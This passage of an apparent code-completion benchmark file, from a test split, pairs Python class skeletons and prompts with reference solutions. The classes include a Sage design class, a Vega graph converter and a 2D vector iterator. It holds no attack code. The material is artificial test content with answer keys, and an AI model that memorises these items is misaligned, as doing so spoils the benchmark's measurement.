[list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4 sage: GDD.groups() [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26, 27, 28, 29], [30, 31, 32, 33, 34, 35, 36, 37, 38, 39]] TESTS: Non-integer ground set:: sage: TD=designs.transversal_design(5,5) sage: TD.relabel({i:chr(97+i) for i in range(25)}) sage: TD.groups() [['a', 'b', 'c', 'd', 'e'], [\"\"\"\n if self._point_to_index is None:\n return [list(g) for g in self._groups]\n else:\n return [[self._points[i] for i in g] for g in self._groups]\n\n def __repr__(self):\n \"\"\"Returns a string that describes self EXAMPLE:: sage: from sage.combinat.designs.group_divisible_designs import GroupDivisibleDesign sage: TD = designs.transversal_design(4,10) sage: groups = [list(range(i*10,(i+1)*10)) for i in range(4)] sage: GDD = GroupDivisibleDesign(40,groups,TD); GDD Group Divisible Design on 40 points of type 10^4\"\"\"\n group_sizes = [len(_) for _ in self._groups]\n gdd_type = ['{}^{}'.format(s, group_sizes.count(s)) for s in sorted(set(group_sizes))]\n gdd_type = '.'.join(gdd_type)\n if not gdd_type:\n gdd_type = '1^0'\n v = self.num_points()\n return 'Group Divisible Design on {} points of type {}'.format(v, gdd_type)\n", "source": "the_stack_v2_python_sparse", "source_path": "sage/src/sage/combinat/designs/group_divisible_designs.py", "source_repo": "bopopescu/geosci", "split": "test", "star_events_count": 0} {"blob_id": "884b86e1c63265020f9e0eb79cf147ec697ffe39", "bodies": ["self.conditions_dict = conditions_dict\nself.axes_vars = axes_vars\nself.x_axis_label = labels['x_axis']\nself.y_axis_label = labels['y_axis']\nsuper(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\nself.graph_type = 'barbase'", "pandas_df = super(VegaGraphBarBase, self).parse_jsons()\ndf_restricted = pandas_df\nfor key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\ndf_restricted = 
pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\ndf_restricted = df_restricted.reset_index()\nbar = self.read_config()\nbar['data'] = {'values': df_restricted.to_dict(orient='records')}\nbar['encoding']['y']['field'] = self.axes_vars['y']\nbar['encoding']['y']['axis'] = {'title': self.y_axis_label}\nfor key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype == 'float64' or 'int64' or 'float32' or 'int8':\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\nbar['encoding']['x']['field'] = self.axes_vars['x']\nbar['encoding']['x']['axis'] = {'title': self.x_axis_label}\nreturn bar"], "bodies_text": "<|body_start_0|>\n self.conditions_dict = conditions_dict\n self.axes_vars = axes_vars\n self.x_axis_label = labels['x_axis']\n self.y_axis_label = labels['y_axis']\n super(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\n self.graph_type = 'barbase'\n<|end_body_0|>\n\n<|body_start_1|>\n pandas_df = super(VegaGraphBarBase, self).parse_jsons()\n df_restricted = pandas_df\n for key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\n df_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\n df_restricted = df_restricted.reset_index()\n bar = self.read_config()\n bar['data'] = {'values': df_restricted.to_dict(orient='records')}\n bar['encoding']['y']['field'] = self.axes_vars['y']\n bar['encoding']['y']['axis'] = {'title': self.y_axis_label}\n for key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype == 'float64' or 'int64' or 'float32' or 'int8':\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\n bar['encoding']['x']['field'] = self.axes_vars['x']\n bar['encoding']['x']['axis'] = {'title': self.x_axis_label}\n return bar\n<|end_body_1|>\n", "class_docstring": "Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the", "class_name": "VegaGraphBarBase", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VegaGraphBarBase:\n \"\"\"Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. 
Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\"\"\"\n\n def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars):\n \"\"\"Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\"\"\"\n <|body_0|>\n\n def parse_jsons(self):\n \"\"\"Parses the input json files using Pandas. Returns: the json file to be written to file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.conditions_dict = conditions_dict\n self.axes_vars = axes_vars\n self.x_axis_label = labels['x_axis']\n self.y_axis_label = labels['y_axis']\n super(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\n self.graph_type = 'barbase'\n<|end_body_0|>\n\n<|body_start_1|>\n pandas_df = super(VegaGraphBarBase, self).parse_jsons()\n df_restricted = pandas_df\n for key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\n df_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\n df_restricted = df_restricted.reset_index()\n bar = self.read_config()\n bar['data'] = {'values': df_restricted.to_dict(orient='records')}\n bar['encoding']['y']['field'] = self.axes_vars['y']\n bar['encoding']['y']['axis'] = {'title': self.y_axis_label}\n for key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype == 'float64' or 'int64' or 'float32' or 'int8':\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\n bar['encoding']['x']['field'] = self.axes_vars['x']\n bar['encoding']['x']['axis'] = {'title': self.x_axis_label}\n return bar\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000054", "length_bytes": 16246, "license_type": "no_license", "methods": [{"docstring": "Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.", "name": "__init__", "signature": "def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars)"}, {"docstring": "Parses the input json files using Pandas. Returns: the json file to be written to file.", "name": "parse_jsons", "signature": "def parse_jsons(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002102", "prompt": "Implement the Python class `VegaGraphBarBase` described below.\n\nClass description:\nClass for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\n\nMethod signatures and docstrings:\n- def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars): Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\n- def parse_jsons(self): Parses the input json files using Pandas. 
Returns: the json file to be written to file.", "prompted_full_text": "Implement the Python class `VegaGraphBarBase` described below.\n\nClass description:\nClass for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\n\nMethod signatures and docstrings:\n- def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars): Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\n- def parse_jsons(self): Parses the input json files using Pandas. Returns: the json file to be written to file.\n\n<|skeleton|>\nclass VegaGraphBarBase:\n \"\"\"Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\"\"\"\n\n def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars):\n \"\"\"Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\"\"\"\n <|body_0|>\n\n def parse_jsons(self):\n \"\"\"Parses the input json files using Pandas. 
Returns: the json file to be written to file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.conditions_dict = conditions_dict\n self.axes_vars = axes_vars\n self.x_axis_label = labels['x_axis']\n self.y_axis_label = labels['y_axis']\n super(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\n self.graph_type = 'barbase'\n<|end_body_0|>\n\n<|body_start_1|>\n pandas_df = super(VegaGraphBarBase, self).parse_jsons()\n df_restricted = pandas_df\n for key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\n df_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\n df_restricted = df_restricted.reset_index()\n bar = self.read_config()\n bar['data'] = {'values': df_restricted.to_dict(orient='records')}\n bar['encoding']['y']['field'] = self.axes_vars['y']\n bar['encoding']['y']['axis'] = {'title': self.y_axis_label}\n for key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype in ('float64', 'int64', 'float32', 'int8'):\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\n bar['encoding']['x']['field'] = self.axes_vars['x']\n bar['encoding']['x']['axis'] = {'title': self.x_axis_label}\n return bar\n<|end_body_1|>\n", "revision_id": "d42ec8e8328117d70fb910f2d1f751ce15862810", "skeleton": "<|skeleton|>\nclass VegaGraphBarBase:\n \"\"\"Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\"\"\"\n\n def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars):\n \"\"\"Instantiate the input arguments. References the base class __init__ to instantiate recurring ones.\"\"\"\n <|body_0|>\n\n def parse_jsons(self):\n \"\"\"Parses the input json files using Pandas. Returns: the json file to be written to file.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VegaGraphBarBase:\n \"\"\"Class for converting json outputs of different algorithms to vega-specific bar or scatter graph json files. This class is a child class of VegaGraphBase and inherits all the methods and variables. It serves as a base class to VegaGraphBar and VegaGraphScatter. Attributes: output_path: the output directory to write the vega-spec json files to. input_path: the input path containing the input json files to be processed. config_dir: the directory containing the json config files relevant to each plot type. Each config file will need to have a specific name of the format: '_config.json' labels: a dictionary containing the relevant nouns required for naming the file and the axes of the\"\"\"\n\n def __init__(self, output_path, input_path, config_dir, labels, conditions_dict, axes_vars):\n \"\"\"Instantiate the input arguments. 
References the base class __init__ to instantiate recurring ones.\"\"\"\n self.conditions_dict = conditions_dict\n self.axes_vars = axes_vars\n self.x_axis_label = labels['x_axis']\n self.y_axis_label = labels['y_axis']\n super(VegaGraphBarBase, self).__init__(output_path, input_path, config_dir, labels)\n self.graph_type = 'barbase'\n\n def parse_jsons(self):\n \"\"\"Parses the input json files using Pandas. Returns: the json file to be written to file.\"\"\"\n pandas_df = super(VegaGraphBarBase, self).parse_jsons()\n df_restricted = pandas_df\n for key, value in self.conditions_dict.iteritems():\n df_restricted = df_restricted.loc[df_restricted[key] == value]\n df_restricted = pandas.DataFrame(df_restricted.set_index(self.axes_vars['x'])[self.axes_vars['y']])\n df_restricted = df_restricted.reset_index()\n bar = self.read_config()\n bar['data'] = {'values': df_restricted.to_dict(orient='records')}\n bar['encoding']['y']['field'] = self.axes_vars['y']\n bar['encoding']['y']['axis'] = {'title': self.y_axis_label}\n for key in self.axes_vars:\n if df_restricted[self.axes_vars[key]].dtype in ('float64', 'int64', 'float32', 'int8'):\n bar['encoding'][key]['type'] = 'quantitative'\n else:\n bar['encoding'][key]['type'] = 'ordinal'\n bar['encoding']['x']['field'] = self.axes_vars['x']\n bar['encoding']['x']['axis'] = {'title': self.x_axis_label}\n return bar\n", "source": "the_stack_v2_python_sparse", "source_path": "scripts/json2vega.py", "source_repo": "gunrock/io", "split": "test", "star_events_count": 11} {"blob_id": "8449739dd0f1e7fe6916a3dcc5d2939d5042bd6d", "bodies": ["Animal.__init__(self, habitat)\nMammal.__init__(self, food, fur)\nself.age = age\nself.sex = sex\nprint('---A Human---')", "print(f'\\nAge: {self.age}')\nprint(f'Sex: {self.sex}')\nprint(f'Habitat: {self.habitat}')\nprint(f'Food: {self.food}')\nprint(f'Fur: {self.fur}\\n')"], "bodies_text": "<|body_start_0|>\n Animal.__init__(self, habitat)\n Mammal.__init__(self, food, fur)\n self.age = age\n self.sex = sex\n print('---A Human---')\n<|end_body_0|>\n\n<|body_start_1|>\n print(f'\\nAge: {self.age}')\n print(f'Sex: {self.sex}')\n print(f'Habitat: {self.habitat}')\n print(f'Food: {self.food}')\n print(f'Fur: {self.fur}\\n')\n<|end_body_1|>\n", "class_docstring": "Human class. Args: age (int): Age of the human. sex (str): Sex of the human.", "class_name": "Human", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Human:\n \"\"\"Human class. Args: age (int): Age of the human. 
sex (str): Sex of the human.\"\"\"\n\n def __init__(self, age, sex, habitat, food, fur=False):\n \"\"\"Constructor of Human class.\"\"\"\n <|body_0|>\n\n def display(self):\n \"\"\"Display method to print the different characteristics.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Animal.__init__(self, habitat)\n Mammal.__init__(self, food, fur)\n self.age = age\n self.sex = sex\n print('---A Human---')\n<|end_body_0|>\n\n<|body_start_1|>\n print(f'\\nAge: {self.age}')\n print(f'Sex: {self.sex}')\n print(f'Habitat: {self.habitat}')\n print(f'Food: {self.food}')\n print(f'Fur: {self.fur}\\n')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000055", "length_bytes": 2135, "license_type": "no_license", "methods": [{"docstring": "Constructor of Human class.", "name": "__init__", "signature": "def __init__(self, age, sex, habitat, food, fur=False)"}, {"docstring": "Display method to print the different characteristics.", "name": "display", "signature": "def display(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005644", "prompt": "Implement the Python class `Human` described below.\n\nClass description:\nHuman class. Args: age (int): Age of the human. sex (str): Sex of the human.\n\nMethod signatures and docstrings:\n- def __init__(self, age, sex, habitat, food, fur=False): Constructor of Human class.\n- def display(self): Display method to print the different characteristics.", "prompted_full_text": "Implement the Python class `Human` described below.\n\nClass description:\nHuman class. Args: age (int): Age of the human. sex (str): Sex of the human.\n\nMethod signatures and docstrings:\n- def __init__(self, age, sex, habitat, food, fur=False): Constructor of Human class.\n- def display(self): Display method to print the different characteristics.\n\n<|skeleton|>\nclass Human:\n \"\"\"Human class. Args: age (int): Age of the human. sex (str): Sex of the human.\"\"\"\n\n def __init__(self, age, sex, habitat, food, fur=False):\n \"\"\"Constructor of Human class.\"\"\"\n <|body_0|>\n\n def display(self):\n \"\"\"Display method to print the different characteristics.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n Animal.__init__(self, habitat)\n Mammal.__init__(self, food, fur)\n self.age = age\n self.sex = sex\n print('---A Human---')\n<|end_body_0|>\n\n<|body_start_1|>\n print(f'\\nAge: {self.age}')\n print(f'Sex: {self.sex}')\n print(f'Habitat: {self.habitat}')\n print(f'Food: {self.food}')\n print(f'Fur: {self.fur}\\n')\n<|end_body_1|>\n", "revision_id": "892d9c25b9712bf3bbfd7f29529eca8b47fb8039", "skeleton": "<|skeleton|>\nclass Human:\n \"\"\"Human class. Args: age (int): Age of the human. sex (str): Sex of the human.\"\"\"\n\n def __init__(self, age, sex, habitat, food, fur=False):\n \"\"\"Constructor of Human class.\"\"\"\n <|body_0|>\n\n def display(self):\n \"\"\"Display method to print the different characteristics.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Human:\n \"\"\"Human class. Args: age (int): Age of the human. 
sex (str): Sex of the human.\"\"\"\n\n def __init__(self, age, sex, habitat, food, fur=False):\n \"\"\"Constructor of Human class.\"\"\"\n Animal.__init__(self, habitat)\n Mammal.__init__(self, food, fur)\n self.age = age\n self.sex = sex\n print('---A Human---')\n\n def display(self):\n \"\"\"Display method to print the different characteristics.\"\"\"\n print(f'\\nAge: {self.age}')\n print(f'Sex: {self.sex}')\n print(f'Habitat: {self.habitat}')\n print(f'Food: {self.food}')\n print(f'Fur: {self.fur}\\n')\n", "source": "the_stack_v2_python_sparse", "source_path": "sem-3/practical_26_Nov.py", "source_repo": "B-Tech-AI-Python/Class-assignments", "split": "test", "star_events_count": 0} {"blob_id": "f37b5c32a812d5101b89c304aa72b5a7cd677016", "bodies": ["self.row = 0\nself.col = 0\nself.vec2d = vec2d", "result = self.vec2d[self.row][self.col]\nself.col += 1\nreturn result", "while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\nreturn False"], "bodies_text": "<|body_start_0|>\n self.row = 0\n self.col = 0\n self.vec2d = vec2d\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.vec2d[self.row][self.col]\n self.col += 1\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\n return False\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Vector2D", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Vector2D:\n\n def __init__(self, vec2d):\n \"\"\"Initialize your data structure here. :type vec2d: List[List[int]]\"\"\"\n <|body_0|>\n\n def next(self):\n \"\"\":rtype: int\"\"\"\n <|body_1|>\n\n def hasNext(self):\n \"\"\":rtype: bool\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.row = 0\n self.col = 0\n self.vec2d = vec2d\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.vec2d[self.row][self.col]\n self.col += 1\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\n return False\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000056", "length_bytes": 867, "license_type": "permissive", "methods": [{"docstring": "Initialize your data structure here. :type vec2d: List[List[int]]", "name": "__init__", "signature": "def __init__(self, vec2d)"}, {"docstring": ":rtype: int", "name": "next", "signature": "def next(self)"}, {"docstring": ":rtype: bool", "name": "hasNext", "signature": "def hasNext(self)"}], "n_methods": 3, "prompt": "Implement the Python class `Vector2D` described below.\n\nClass description:\nImplement the Vector2D class.\n\nMethod signatures and docstrings:\n- def __init__(self, vec2d): Initialize your data structure here. :type vec2d: List[List[int]]\n- def next(self): :rtype: int\n- def hasNext(self): :rtype: bool", "prompted_full_text": "Implement the Python class `Vector2D` described below.\n\nClass description:\nImplement the Vector2D class.\n\nMethod signatures and docstrings:\n- def __init__(self, vec2d): Initialize your data structure here. :type vec2d: List[List[int]]\n- def next(self): :rtype: int\n- def hasNext(self): :rtype: bool\n\n<|skeleton|>\nclass Vector2D:\n\n def __init__(self, vec2d):\n \"\"\"Initialize your data structure here. 
:type vec2d: List[List[int]]\"\"\"\n <|body_0|>\n\n def next(self):\n \"\"\":rtype: int\"\"\"\n <|body_1|>\n\n def hasNext(self):\n \"\"\":rtype: bool\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.row = 0\n self.col = 0\n self.vec2d = vec2d\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.vec2d[self.row][self.col]\n self.col += 1\n return result\n<|end_body_1|>\n\n<|body_start_2|>\n while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\n return False\n<|end_body_2|>\n", "revision_id": "2cb4b45dd14a230aa0e800042e893f8dfb23beda", "skeleton": "<|skeleton|>\nclass Vector2D:\n\n def __init__(self, vec2d):\n \"\"\"Initialize your data structure here. :type vec2d: List[List[int]]\"\"\"\n <|body_0|>\n\n def next(self):\n \"\"\":rtype: int\"\"\"\n <|body_1|>\n\n def hasNext(self):\n \"\"\":rtype: bool\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Vector2D:\n def __init__(self, vec2d):\n \"\"\"Initialize your data structure here. :type vec2d: List[List[int]]\"\"\"\n self.row = 0\n self.col = 0\n self.vec2d = vec2d\n\n def next(self):\n \"\"\":rtype: int\"\"\"\n result = self.vec2d[self.row][self.col]\n self.col += 1\n return result\n\n def hasNext(self):\n \"\"\":rtype: bool\"\"\"\n while self.row < len(self.vec2d):\n if self.col < len(self.vec2d[self.row]):\n return True\n else:\n self.row += 1\n self.col = 0\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "MY_REPOS/INTERVIEW-PREP-COMPLETE/Leetcode/251.py", "source_repo": "bgoonz/UsefulResourceRepo2.0", "split": "test", "star_events_count": 10} {"blob_id": "d482198d2918ff18e254e2be319fa6ce6e5e1274", "bodies": ["if not value:\n return []\nif isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\nelse:\n return value", "super(MultiEmailField, self).validate(value)\nfor email in value:\n validate_email(email)"], "bodies_text": "<|body_start_0|>\n if not value:\n return []\n if isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\n else:\n return value\n<|end_body_0|>\n\n<|body_start_1|>\n super(MultiEmailField, self).validate(value)\n for email in value:\n validate_email(email)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "MultiEmailField", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MultiEmailField:\n\n def to_python(self, value):\n \"\"\"Normalize data to a list of strings.\"\"\"\n <|body_0|>\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not value:\n return []\n if isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\n else:\n return value\n<|end_body_0|>\n\n<|body_start_1|>\n super(MultiEmailField, self).validate(value)\n for email in value:\n validate_email(email)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000057", "length_bytes": 3815, "license_type": "permissive", "methods": [{"docstring": "Normalize data to a list of strings.", "name": "to_python", "signature": "def to_python(self, value)"}, {"docstring": "Check if value consists only of valid emails.", "name": "validate", 
"signature": "def validate(self, value)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000258", "prompt": "Implement the Python class `MultiEmailField` described below.\n\nClass description:\nImplement the MultiEmailField class.\n\nMethod signatures and docstrings:\n- def to_python(self, value): Normalize data to a list of strings.\n- def validate(self, value): Check if value consists only of valid emails.", "prompted_full_text": "Implement the Python class `MultiEmailField` described below.\n\nClass description:\nImplement the MultiEmailField class.\n\nMethod signatures and docstrings:\n- def to_python(self, value): Normalize data to a list of strings.\n- def validate(self, value): Check if value consists only of valid emails.\n\n<|skeleton|>\nclass MultiEmailField:\n\n def to_python(self, value):\n \"\"\"Normalize data to a list of strings.\"\"\"\n <|body_0|>\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not value:\n return []\n if isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\n else:\n return value\n<|end_body_0|>\n\n<|body_start_1|>\n super(MultiEmailField, self).validate(value)\n for email in value:\n validate_email(email)\n<|end_body_1|>\n", "revision_id": "aeaae292fbd55aca1b6043227ec105e67d73367f", "skeleton": "<|skeleton|>\nclass MultiEmailField:\n\n def to_python(self, value):\n \"\"\"Normalize data to a list of strings.\"\"\"\n <|body_0|>\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MultiEmailField:\n def to_python(self, value):\n \"\"\"Normalize data to a list of strings.\"\"\"\n if not value:\n return []\n if isinstance(value, basestring):\n values = value.split(',')\n return [x.strip() for x in values if x.strip()]\n else:\n return value\n\n def validate(self, value):\n \"\"\"Check if value consists only of valid emails.\"\"\"\n super(MultiEmailField, self).validate(value)\n for email in value:\n validate_email(email)\n", "source": "the_stack_v2_python_sparse", "source_path": "ietf/utils/fields.py", "source_repo": "omunroe-com/ietfdb2", "split": "test", "star_events_count": 2} {"blob_id": "0da743e9fd2ee531cf516f7f91c5835232851ffa", "bodies": ["test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\nif test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\nreturn (test, traceback)", "if switch is None:\n switch = self.format_and_eval_string(self.switch)\nif switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\nelse:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)"], "bodies_text": "<|body_start_0|>\n test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\n if test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\n return 
(test, traceback)\n<|end_body_0|>\n\n<|body_start_1|>\n if switch is None:\n switch = self.format_and_eval_string(self.switch)\n if switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\n else:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)\n<|end_body_1|>\n", "class_docstring": "Switch on/off the pulse modulation of the source.", "class_name": "SetPulseModulationTask", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SetPulseModulationTask:\n \"\"\"Switch on/off the pulse modulation of the source.\"\"\"\n\n def check(self, *args, **kwargs):\n \"\"\"Validate the value of the switch.\"\"\"\n <|body_0|>\n\n def i_perform(self, switch=None):\n \"\"\"Default interface behavior.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\n if test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\n return (test, traceback)\n<|end_body_0|>\n\n<|body_start_1|>\n if switch is None:\n switch = self.format_and_eval_string(self.switch)\n if switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\n else:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000058", "length_bytes": 7840, "license_type": "permissive", "methods": [{"docstring": "Validate the value of the switch.", "name": "check", "signature": "def check(self, *args, **kwargs)"}, {"docstring": "Default interface behavior.", "name": "i_perform", "signature": "def i_perform(self, switch=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007372", "prompt": "Implement the Python class `SetPulseModulationTask` described below.\n\nClass description:\nSwitch on/off the pulse modulation of the source.\n\nMethod signatures and docstrings:\n- def check(self, *args, **kwargs): Validate the value of the switch.\n- def i_perform(self, switch=None): Default interface behavior.", "prompted_full_text": "Implement the Python class `SetPulseModulationTask` described below.\n\nClass description:\nSwitch on/off the pulse modulation of the source.\n\nMethod signatures and docstrings:\n- def check(self, *args, **kwargs): Validate the value of the switch.\n- def i_perform(self, switch=None): Default interface behavior.\n\n<|skeleton|>\nclass SetPulseModulationTask:\n 